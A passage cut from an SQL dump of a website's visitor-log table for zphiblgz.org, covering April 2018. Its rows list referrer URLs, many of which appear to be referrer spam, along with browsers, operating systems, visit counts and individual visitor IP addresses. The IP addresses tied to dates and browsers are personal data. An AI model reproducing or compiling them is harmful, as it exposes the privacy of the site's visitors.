B&text=&etext=1763.q5xy0EDZHxY20l4jts_d5FAnuAby_wwGmmPEAkQUOqk.9d45396869ec69ce0d1e72218fbc35a31c255de4&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040a2RKb0tiVU5xV2d3YVlEaFhwZ2dHZkRDRzhlV3hHR0FQYzhwNEczeng2QSws&sign=f31c5ef3d04f6ef41fe5dec9ae75b193&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','138.197.183.70','000',2,0),(29167,'2018-04-20','http://metallo-konstruktsii.ru/','MSIE','Windows','6.0','','178.159.37.55','000',6,0),(29168,'2018-04-20','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.31','000',1,0),(29169,'2018-04-20','https://zphiblgz.org','Firefox','Windows','7.0.1','','171.25.193.235','000',1,0),(29170,'2018-04-20','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','69.4.92.158','000',2,0),(29171,'2018-04-20','http://magnetic-bracelets.ru/','MSIE','Windows','6.0','','178.137.81.28','000',4,0),(29172,'2018-04-20','http://aibolita.com/','MSIE','Windows','2.0','','46.119.121.74','000',2,0),(29173,'2018-04-20','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.28','000',1,0),(29174,'2018-04-20','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.28','000',1,0),(29175,'2018-04-20','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',6,0),(29176,'2018-04-20','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.28','000',1,0),(29177,'2018-04-20','https://exdocsfiles.com/','MSIE','Windows','6.0','','178.137.165.1','000',4,0),(29178,'2018-04-20','https://zphiblgz.org','Chrome','Linux','65.0.3325.181','','138.197.111.102','000',3,0),(29179,'2018-04-20','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',3,0),(29180,'2018-04-20','https://www.google.com/','Chrome','Windows','65.0.3325.181','','141.215.16.56','000',4,0),(29181,'2018-04-20','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.30','000',1,0),(29182,'2018-04-20','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.30','000',1,0),(29183,'2018-04-20','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.32','000',1,0),(29184,'2018-04-20','https://zphiblgz.org','python-requests','Unknown','2.18.4','','209.150.108.10','000',1,0),(29185,'2018-04-20','https://search.yahoo.com/','Firefox','Windows','59.0','','107.147.67.239','000',1,0),(29186,'2018-04-20','http://fartunabest.ru/','MSIE','Windows','6.0','','5.248.196.93','000',3,0),(29187,'2018-04-20','https://zphiblgz.org','Chrome','Windows','45.0.2454.93','','202.46.49.74','000',1,0),(29188,'2018-04-20','https://zphiblgz.org','Chrome','Windows','45.0.2454.93','','202.46.52.206','000',1,0),(29189,'2018-04-20','https://zphiblgz.org','MSIE','Windows','11.0','','161.69.99.11','000',2,0),(29190,'2018-04-20','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.27','000',1,0),(29191,'2018-04-20','http://zouxiuwang.com/PNWnZ/SoaiZ/icPZU/','MSIE','Windows','8.0','','199.249.223.44','000',2,0),(29192,'2018-04-21','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','178.62.10.47','000',2,0),(29193,'2018-04-21','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.28','000',1,0),(29194,'2018-04-21','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.28','000',1,0),(29195,'2018-04-21','https://laminat.com.ua/','MSIE','Windows','6.0','','46.119.121.74','000',7,0),(29196,'2018-04-21','https://zphiblgz.org/history/','AppleWebKit','Windows','534','','199.30.25.177','000',1,0),(29197,'2018-04-21','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1764.PS419MakcrpbZdIh1WjdEDcXgKMHiDX-VGonfx64Qg4.11151ae08f81e8d8458dfc82105cb45d6f41fab8&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043M2NvNkJiUHRaWHY1WVdHSDFZa1hUMmNRZ2pEb1ZjdE1IWlhRQXplSFFHQSws&sign=f15c4b490e5c13ea4da6715b403f10b6&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','178.79.163.215','000',2,0),(29198,'2018-04-21','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1764.oiisYq1676BWPdWEn4ymahzZFYMS0zqQGyeq8jT6MCI.7d2018a38dca7b1bc5955d68634db0cbd3a0034b&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040cjBEdWdzRmtjb0ZIbHN1OW05VzBOeXhRanZnZ0ZfcFZEUm5zRDl4Q0FZZyws&sign=853513cca5b770425627135b0be97195&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','45.79.5.33','000',2,0),(29199,'2018-04-21','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1764.k4fOQQTKR9d_Du3_SANrZPSJ2ZzqYrLlbsjLeDr_CgU.bdabe76089746f3da722cc1545de7a1dc2e65f32&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040dnUzb0EzZ2FqanVvaFZVOWlaeDdTTGpxVUhjMWhCLTFZOTgwV1NTU2dkdyws&sign=a42582748a459378e6ab225495e48737&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','142.44.160.221','000',2,0),(29200,'2018-04-21','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1764.iYaHKMrMrg_0jm5AMvvqQ-fLq65nV4iqEklNYo3ny00.bc029b292087e5b78aacaa7d5f65d13e3123af42&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041M1RvMDRFbTdEWTY2M01iMFVuVVRhb3hTX0FFMjNXdnA2QkIxNGl6YzFXQSws&sign=8be39da9e6ff44c45b0c61969d0af669&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','138.68.94.227','000',2,0),(29201,'2018-04-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','150.95.178.249','000',2,0),(29202,'2018-04-21','http://www.stavimdveri.ru/sitemap.html','MSIE','Windows','6.0','','178.137.164.67','000',5,0),(29203,'2018-04-21','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',8,0),(29204,'2018-04-21','https://zphiblgz.org','Firefox','Windows','40.1','','89.137.123.156','000',2,0),(29205,'2018-04-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','104.196.135.31','000',4,0),(29206,'2018-04-21','http://komputers-best.ru/','MSIE','Windows','6.0','','178.137.81.28','000',3,0),(29207,'2018-04-21','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.32','000',1,0),(29208,'2018-04-21','https://zphiblgz.org','Chrome','Windows','12.0.742.91','','208.80.194.32','000',1,0),(29209,'2018-04-21','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.89','','104.131.19.168','000',2,0),(29210,'2018-04-21','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.32','000',1,0),(29211,'2018-04-21','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.32','000',1,0),(29212,'2018-04-21','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.179.110','000',1,0),(29213,'2018-04-21','http://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.59','000',2,0),(29214,'2018-04-21','https://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.109','000',1,0),(29215,'2018-04-21','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',3,0),(29216,'2018-04-21','https://zphiblgz.org','Chrome','iPhone','66.0.3359.122','','65.242.44.2','000',1,0),(29217,'2018-04-21','https://zphiblgz.org/','Firefox','Windows','44.0','','31.130.4.240','000',2,0),(29218,'2018-04-21','https://zphiblgz.org','Firefox','Windows','40.1','','141.239.216.192','000',2,0),(29219,'2018-04-21','https://zphiblgz.org/','Firefox','Windows','30.0','','31.130.4.240','000',1,0),(29220,'2018-04-21','http://www.google.com/search','Chrome','Linux','41.0.2272.118','','66.102.6.108','000',1,0),(29221,'2018-04-21','https://zphiblgz.org/history/','Chrome','Linux','41.0.2272.118','','66.102.6.106','000',1,0),(29222,'2018-04-21','https://zphiblgz.org','Firefox','Windows','40.1','','89.123.107.149','000',1,0),(29223,'2018-04-21','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.32','000',1,0),(29224,'2018-04-21','http://www.zphiblgz.org','Chrome','Linux','65.0.3325.181','','138.197.7.17','000',18,0),(29225,'2018-04-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.7.17','000',1,0),(29226,'2018-04-21','https://zphiblgz.org/','Firefox','Windows','37.0','','178.172.147.240','000',1,0),(29227,'2018-04-21','https://distonija.com/','MSIE','Windows','5.5','','178.137.164.67','000',4,0),(29228,'2018-04-21','https://www.sundrugstore.com/','MSIE','Unknown','6.0','','46.119.121.74','000',1,0),(29229,'2018-04-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','129.78.110.124','000',2,0),(29230,'2018-04-21','https://zphiblgz.org/','Firefox','Windows','33.1','','136.169.194.106','000',2,0),(29231,'2018-04-21','https://zphiblgz.org','Chrome','Linux','65.0.3325.181','','138.197.111.32','000',3,0),(29232,'2018-04-21','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1765.7Yu7Hx2DfMoyg5AYEvLVHUJ7OO7NggwHvHXlfSZlmE59zgICTzTQAMp1IsbBXnSd.bb87430b654c4d61a8cf3ca87b3e2aae0452ee0d&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YGHEttDsYq_w3pSJtejupWg&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV2REMmNVN0R2VGlkcHlQZDNhNHZYVV9WajhQMjAzcklVSGdqLTlrN3E1c1RwYlppcURCTDY0VnNXS2xJT1NUV3p5R19pdndQeXNCdw&b64e=2&sign=1f2026671694021ef8a0a47179466d06&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYuwSQLovbTTULVmCg3YVGXGXwQATqmRYWL5D_vEUhtzHudx-ASzZeninc89pdlMG0IxRy2c_DvBDtRXtNeZXHn2b4rRLuo8bq9feQa52eQWR_CVnts3FhTeCbrOtjOERg&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXPiQz_kDwsW1O88J5T5pR4trg6R57y1AZeDoviWM7513e1kdHOzZHd_s1HvrtHnqwo6ZiQV6gcFA&l10n=ru&cts=1524361246323&mc=2.2716222276','Chrome','Windows','64.0.3282.186','','89.178.238.106','000',2,0),(29233,'2018-04-21','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.29','000',1,0),(29234,'2018-04-21','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.28','000',1,0),(29235,'2018-04-21','https://zphiblgz.org/','Firefox','Windows','51.0','','31.130.4.240','000',2,0),(29236,'2018-04-21','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.30','000',1,0),(29237,'2018-04-21','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.30','000',1,0),(29238,'2018-04-22','https://zphiblgz.org','Chrome','Macintosh','51.0.2704.84','','199.19.224.189','000',2,0),(29239,'2018-04-22','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',10,0),(29240,'2018-04-22','https://zphiblgz.org','Firefox','Linux','50.0','','137.226.113.22','000',2,0),(29241,'2018-04-22','https://bird1.ru/','Opera','Windows','9.0','','178.159.37.55','000',3,0),(29242,'2018-04-22','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','188.166.149.0','000',2,0),(29243,'2018-04-22','https://zphiblgz.org/','Firefox','Windows','52.0','','95.105.31.152','000',2,0),(29244,'2018-04-22','http://zphiblgz.org/','Chrome','Windows','61.0.3163.100','','146.185.223.111','000',3,0),(29245,'2018-04-22','https://zphiblgz.org','Chrome','Macintosh','49.0.2623.87','','104.129.192.79','000',2,0),(29246,'2018-04-22','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.32','000',1,0),(29247,'2018-04-22','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.32','000',1,0),(29248,'2018-04-22','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1765.aSAc7dS6qyszByFtASaE08R1I_anPu1Flh-GESBfBJ8.fd69c7cba31a1a3a7e3a01ee173ff06f32cfc364&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040a1N4QkE4aDZ3Q3hGLVRNVHJJOUoxeEhzcmYwN3RjSjlNb25IVk5JT184QSws&sign=831ec1ca8a23fb0ae2cfa384f0c981d2&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.156.92','000',2,0),(29249,'2018-04-22','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1765.4G2yWTwLyG9W7pwyojIv5OjpxvIi1QNyAsDxldbWCfY.480024d23d6b870c9ed48f74896968a67de0afea&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041UDdWeUtacmxHaDlQbWRBTlUzWGk5S0RwNHY4N2R3TklCV01QRlZ5RkF1Zyws&sign=7646533d22666c1fd63c9b680f7a4059&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','109.74.199.112','000',2,0),(29250,'2018-04-22','https://zphiblgz.org','Firefox','Windows','40.1','','78.130.181.132','000',2,0),(29251,'2018-04-22','http://03e.info/','Opera','Windows','8.01','','178.159.37.55','000',3,0),(29252,'2018-04-22','https://zphiblgz.org','Chrome','Windows','55.0.2883.75','','59.57.37.8','000',1,0),(29253,'2018-04-22','https://zphiblgz.org','Firefox','Windows','40.1','','78.97.194.124','000',2,0),(29254,'2018-04-22','http://deart-13.ru/','MSIE','Windows','5.5','','5.248.196.93','000',3,0),(29255,'2018-04-22','https://zphiblgz.org','AppleWebKit','Windows','534','','65.55.210.169','000',1,0),(29256,'2018-04-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.28','000',2,0),(29257,'2018-04-22','https://zphiblgz.org/','Firefox','Windows','40.1','','145.255.3.32','000',2,0),(29258,'2018-04-22','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.27','000',1,0),(29259,'2018-04-22','http://www.google.com/','Chrome','Android','65.0.3325.109','','174.205.22.14','000',1,0),(29260,'2018-04-22','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.32','000',1,0),(29261,'2018-04-22','https://zphiblgz.org/','Firefox','Windows','53.0','','137.74.132.80','000',2,0),(29262,'2018-04-22','https://zphiblgz.org/','Firefox','Windows','42.0','','77.120.125.23','000',2,0),(29263,'2018-04-22','https://zphiblgz.org','Go--client','Unknown','1.1','','195.201.94.133','000',10,0),(29264,'2018-04-22','https://zphiblgz.org','Go--client','Unknown','1.1','','51.15.35.25','000',4,0),(29265,'2018-04-22','https://zphiblgz.org','Go--client','Unknown','1.1','','195.201.89.132','000',2,0),(29266,'2018-04-22','https://www.google.com/url?sa=i&rct=j&q=&esrc=s&source=images&cd=&ved=2ahUKEwj83c2nuM7aAhVP21MKHYU6APwQjRx6BAgAEAU&url=https%3A%2F%2Fzphiblgz.org%2Fhistory%2F&psig=AOvVaw3ceM2Y8hgiLRlQrviB1BB1&ust=1524505631039422','MSIE','Windows','11.0','','143.85.163.27','000',2,0),(29267,'2018-04-22','https://filesclub.net/','MSIE','Windows','6.0','','178.137.165.1','000',2,0),(29268,'2018-04-22','https://professionalsolutions.eu/ru/','MSIE','Windows','6.0','','46.119.121.74','000',3,0),(29269,'2018-04-22','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',4,0),(29270,'2018-04-22','https://zphiblgz.org','Firefox','Windows','57.0','','107.172.39.211','000',1,0),(29271,'2018-04-22','https://zphiblgz.org/','Firefox','Windows','57.0','','154.16.33.206','000',2,0),(29272,'2018-04-22','https://zphiblgz.org','MSIE','Windows','8.0','','159.89.118.233','000',2,0),(29273,'2018-04-22','https://zphiblgz.org','Chrome','Windows','27.0.1453.93','','159.89.118.233','000',1,0),(29274,'2018-04-22','https://zphiblgz.org','Chrome','Windows','27.0.1453.90','','159.89.118.233','000',2,0),(29275,'2018-04-22','https://zphiblgz.org','Firefox','Windows','21.0.0','','159.89.118.233','000',2,0),(29276,'2018-04-22','https://zphiblgz.org/','Chrome','Windows','62.0.3202.94','','31.130.4.240','000',2,0),(29277,'2018-04-22','https://www.google.com/','Chrome','Windows','64.0.3282.167','','69.138.201.238','000',7,0),(29278,'2018-04-22','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.35','000',1,0),(29279,'2018-04-22','https://zphiblgz.org','Chrome','Windows','12.0.742.91','','208.80.194.35','000',1,0),(29280,'2018-04-22','https://zphiblgz.org','Firefox','Macintosh','5.0.1','','208.80.194.29','000',1,0),(29281,'2018-04-22','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.29','000',2,0),(29282,'2018-04-22','https://zphiblgz.org','Chrome','Macintosh','52.0.2743.116','','54.67.116.54','000',1,0),(29283,'2018-04-22','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','66.117.8.42','000',2,0),(29284,'2018-04-22','https://www.bing.com/','Edge','Windows','16.16299','','73.6.22.138','000',4,0),(29285,'2018-04-22','https://zphiblgz.org/','Safari','Macintosh','11.0.1','','149.202.50.209','000',1,0),(29286,'2018-04-22','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.28','000',1,0),(29287,'2018-04-22','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.28','000',1,0),(29288,'2018-04-22','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.32','000',1,0),(29289,'2018-04-22','https://zphiblgz.org','MSIE','Windows','11.0','','161.69.99.11','000',2,0),(29290,'2018-04-22','https://zphiblgz.org','Chrome','Linux','38.0.2138.55','','104.227.17.170','000',2,0),(29291,'2018-04-22','https://www.google.com/','Safari','Macintosh','11.1','','96.241.16.101','000',4,0),(29292,'2018-04-22','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.29','000',1,0),(29293,'2018-04-22','https://www.google.com/','Safari','iPad','604.1','','96.234.239.96','000',2,0),(29294,'2018-04-22','https://hoztorg-opt.ru/','MSIE','Windows','6.0','','178.137.81.28','000',2,0),(29295,'2018-04-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','51.254.125.108','000',3,0),(29296,'2018-04-22','https://zphiblgz.org/','Firefox','Windows','40.1','','77.79.130.32','000',2,0),(29297,'2018-04-22','https://zphiblgz.org','Firefox','Windows','40.1','','27.255.210.127','000',2,0),(29298,'2018-04-22','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.32','000',1,0),(29299,'2018-04-22','https://zphiblgz.org/','Firefox','Windows','40.1','','94.41.148.187','000',2,0),(29300,'2018-04-23','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.31','000',1,0),(29301,'2018-04-23','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','165.227.233.46','000',2,0),(29302,'2018-04-23','http://zphiblgz.org/event/ms-walk-2017/','Firefox','Windows','33.1','','146.185.223.202','000',2,0),(29303,'2018-04-23','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','142.4.215.116','000',47,0),(29304,'2018-04-23','https://allergick.com/','Opera','Windows','7.60','','178.137.165.1','000',1,0),(29305,'2018-04-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.27','000',2,0),(29306,'2018-04-23','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1766.CVPjxDkbPKoAu1TkZXUoc6q5NuQ6v1M5zopb8mIDGTo.53bef505777e02d47311aabc1831b0ba69574abb&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040ZUZONjlIZHhmS1NhYVhqS3JnOWh2Mk9DV1c2bVlnNnNMMDRLZmRQeDlGQSws&sign=94beb537bffa2534bfda29f771965f63&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','162.243.33.246','000',2,0),(29307,'2018-04-23','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1766.1RSI6YsOshDDNBRuVFeLSS9-hgJ1RlP7aZRL9AYAi28.af5d24176041ac3bab47e9f060418ff1049b32ee&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043Z2FHdFp1MlhNVkprRzZDVGZUVTNfY1FiMHY0d1FnYjlsS2twMW9DS080USws&sign=cf1b3c41c9bf94a944ff538eb2e434c9&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','139.59.179.158','000',2,0),(29308,'2018-04-23','https://zphiblgz.org','Chrome','Windows','51.0.2704.79','','151.139.1.33','000',1,0),(29309,'2018-04-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','51.254.125.108','000',1,0),(29310,'2018-04-23','https://zphiblgz.org','Chrome','Windows','36.0.1985.125','','31.184.192.185','000',3,0),(29311,'2018-04-23','https://zphiblgz.org','Chrome','Windows','50.0.2661.102','','195.184.208.198','000',3,0),(29312,'2018-04-23','http://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.109','000',4,0),(29313,'2018-04-23','https://www.bing.com/','MSIE','Windows','11.0','','76.8.138.162','000',3,0),(29314,'2018-04-23','http://xn----7sbabn5abjehfwi8bj.xn--p1ai/','MSIE','Windows','6.0','','178.137.81.28','000',3,0),(29315,'2018-04-23','http://zphiblgz.org/','Firefox','Windows','52.0','','163.172.4.153','000',1,0),(29316,'2018-04-23','https://zphiblgz.org/','Chrome','Macintosh','58.0.3029.96','','163.172.4.153','000',1,0),(29317,'2018-04-23','https://www.google.com/','SamsungBrowser','Android','7.0','','73.129.23.113','000',2,0),(29318,'2018-04-23','https://zphiblgz.org','Chrome','Windows','24.0.1290.1','','31.184.192.185','000',2,0),(29319,'2018-04-23','https://zphiblgz.org','Chrome','Windows','49.0.2623.112','','12.110.223.26','000',1,0),(29320,'2018-04-23','https://zphiblgz.org/','Firefox','Windows','33.1','','31.130.4.240','000',4,0),(29321,'2018-04-23','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',2,0),(29322,'2018-04-23','https://beremenyashka.com/','Opera','Windows','9.00','','178.137.164.67','000',3,0),(29323,'2018-04-23','https://zphiblgz.org','Firefox','Windows','52.0','','8.44.100.11','000',4,0),(29324,'2018-04-23','https://zphiblgz.org/','Firefox','Windows','40.1','','31.130.4.240','000',2,0),(29325,'2018-04-23','https://zphiblgz.org/','Chrome','Windows','63.0.3239.84','','77.120.125.23','000',2,0),(29326,'2018-04-23','https://www.google.com/','Chrome','Windows','66.0.3359.117','','96.5.121.250','000',4,0),(29327,'2018-04-23','https://zphiblgz.org/','Chrome','Windows','62.0.3202.94','','46.191.148.56','000',1,0),(29328,'2018-04-23','https://zphiblgz.org','Firefox','Windows','7.0.1','','37.233.103.114','000',1,0),(29329,'2018-04-23','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',4,0),(29330,'2018-04-23','https://zphiblgz.org/','Firefox','Windows','44.0','','77.120.125.23','000',2,0),(29331,'2018-04-23','https://zphiblgz.org','Chrome','Windows','60.0.3112.113','','62.4.15.64','000',1,0),(29332,'2018-04-23','https://zphiblgz.org','Chrome','Chrome OS','65.0.3325.209','','68.33.116.9','000',12,0),(29333,'2018-04-23','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.210','000',1,0),(29334,'2018-04-23','https://zphiblgz.org','Chrome','Windows','34.0.1847.137','','54.197.175.21','000',1,0),(29335,'2018-04-23','http://zphiblgz.org','Go--client','Unknown','2.0','','54.197.175.21','000',1,0),(29336,'2018-04-23','https://zphiblgz.org','Chrome','Windows','34.0.1847.137','','54.211.205.235','000',1,0),(29337,'2018-04-23','https://zphiblgz.org','Chrome','Windows','32.0.1700.76','','54.211.244.103','000',3,0),(29338,'2018-04-23','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1767.dys7MY_JaKTRA0c1ejaLkmc1OdmEcNcMBXb7aou3-auQP7Qdbpj7LpC1e7yISQ3t.9f341eb7a7e81e309122994b53f111591d553f04&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YGftRg9cP1erjBfVTUcXDXk&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV2REMmNVN0R2VGlScUpyYXUwQXliQmpUMlFSODVWdmN3OUsyUENoUXFlT2YxSmxUUENnQ2NrLUtjN3IwcEMtZVBWSWwxb3ByS2N0TWM2ZWwzS09xTE5FVUNVWnFyRW1pNTM0eTVwYTZRV3h3&b64e=2&sign=1fd5664aa07cb46e05bfa135005c68fe&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYP93XfrtkbarwefR5ERxukIcP_NIxU4jy1NsnM5q2Hx2dQacpXASIRcATn-WoIVrlVqTai7dt3a8sUNMG8pMbJejZzCyTZO06DnHbN2OYXSc8c_79tGlLW2Y_X89z5W_w&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCVz9TJ3Mp6DkbC9J1US2b4h9Krfsz_W8aj9Fpq3XuvQ_K8mATsXmHK-AriFWlL57fZbTVakd7Daxw&l10n=ru&cts=1524514287523&mc=4.17910571941','MSIE','Windows','10.0','','94.181.71.45','000',1,0),(29339,'2018-04-23','https://picturesmania.com/','MSIE','Windows','6.0','','46.119.121.74','000',5,0),(29340,'2018-04-23','https://zphiblgz.org','Chrome','Windows','45.0.2454.101','','93.179.91.160','000',1,0),(29341,'2018-04-23','https://zphiblgz.org','Firefox','Windows','41.0','','91.200.81.141','000',1,0),(29342,'2018-04-23','https://zphiblgz.org/scholarship/','Chrome','Windows','65.0.3325.181','','73.173.254.31','000',3,0),(29343,'2018-04-23','https://bird1.ru/','MSIE','Windows','6.0','','178.159.37.55','000',6,0),(29344,'2018-04-23','http://t-rec.su/','Unknown','Unknown','Unknown','','46.119.121.74','000',3,0),(29345,'2018-04-23','http://www.zphibmaryland.org/chapters/','Chrome','Macintosh','61.0.3163.100','','108.48.99.138','000',4,0),(29346,'2018-04-23','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.29','000',1,0),(29347,'2018-04-23','http://zphiblgz.org/','WordPress','Unknown','Unknown','','192.0.89.193','000',2,0),(29348,'2018-04-23','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.29','000',1,0),(29349,'2018-04-23','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.28','000',1,0),(29350,'2018-04-23','http://zphiblgz.org/','Chrome','Windows','62.0.3250.0','','95.128.164.253','000',3,0),(29351,'2018-04-23','http://www.regionshop.biz/','MSIE','Windows','6.0','','178.137.164.67','000',5,0),(29352,'2018-04-23','https://zphiblgz.org','Safari','iPhone','9.0','','124.235.138.226','000',1,0),(29353,'2018-04-23','https://zphiblgz.org','